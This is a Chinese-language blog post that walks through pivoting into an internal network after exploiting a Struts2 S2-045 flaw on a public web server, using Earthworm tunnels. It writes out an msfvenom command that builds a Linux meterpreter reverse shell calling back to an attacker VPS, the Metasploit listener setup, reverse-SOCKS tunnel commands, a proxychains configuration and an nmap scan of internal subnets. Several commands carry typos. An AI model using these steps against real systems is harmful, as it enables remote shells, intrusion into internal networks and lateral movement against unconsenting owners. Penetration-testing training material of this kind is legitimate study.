使用EW完成内网代理穿透

1.需求

当发现一台网站服务器存在S2-045漏洞时渗透进行到内网,常需要将流量代理到内网进行进一步扩展如:

  • 端口扫描
  • 端口转发
  • 信息收集

.....

2.需求

  • A1 - 192.168.1.1 - Kali - 本机
  • A2 - 45.32.x.x - Kali - 公网攻击服务器
  • V1 - 218.x.x.x - Centos - 网站服务器,对公网开放,80端口存在web应用,存在S2-045漏洞,路由可抵达10.10.1.0和10.10.10.3.0段。

3.工具介绍

实现内网穿透的工具有很多,如Earthworm,Termite,reGeorg,nps等,此处主要利用ew对模拟内网进行操作。

EW(Earthworm)是一套便携式的网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。
能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,突破网络限制。

4.操作

利用msf制作linux木马:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=45.32.x.x LPOR=6789 -f elf>test.elf

公网vps设置监听:

use exploit/multi/handler
set payload Linux/x86/meterpreter/reverse_tcp
set lhost 45.32.x.x
set lport 6789

用s2-045利用工具将木马和EW传到V1(218.x.x.x - Centos - 网站服务器)并执行命令使木马运行并上线

 

V1在VPS上线后进入到shell在V1和A2之间搭建隧道:

V1:./ew_for_linux64 -s rssocks -d 45.32.x.x -e 1234
A2:./ew_for_linux64 -s rssocks -l 1111 -e 1234

在自己的A1上设置代理:
vi /etc/proxychina.conf
socks5 45.32.x.x 1111

在A2上查看V1的网络情况:

runget_local_subnets

在A1上对V1做信息收集:

proxychina namp -sV -Pn -p- 10.10.1.0

成功扫描到10.10.1.0和10.10.3.0网段的其他主机信息

5.总结

实战中的多样化场景可能更加复杂也可能比较简单,无法一一阐述,

内容都是基础,工具在使用上也无太多难处,关键在于弄清楚实战中目标内网数据流向,把复杂的大场景拆分成若干个小场景,使问题变得简单。

大家可能会觉得操作中MSF的使用对于这次内网穿透没有起到太大帮助,因为这个项目是次实战操作,所以准备充分一点,在后渗透过程中会用到

纸上得来终觉浅,绝知此事要躬行,多实操多思考,方能不断进步。

 

posted @ 2021-01-22 15:01  Sec_snoopyG  阅读(826)  评论(0)    收藏  举报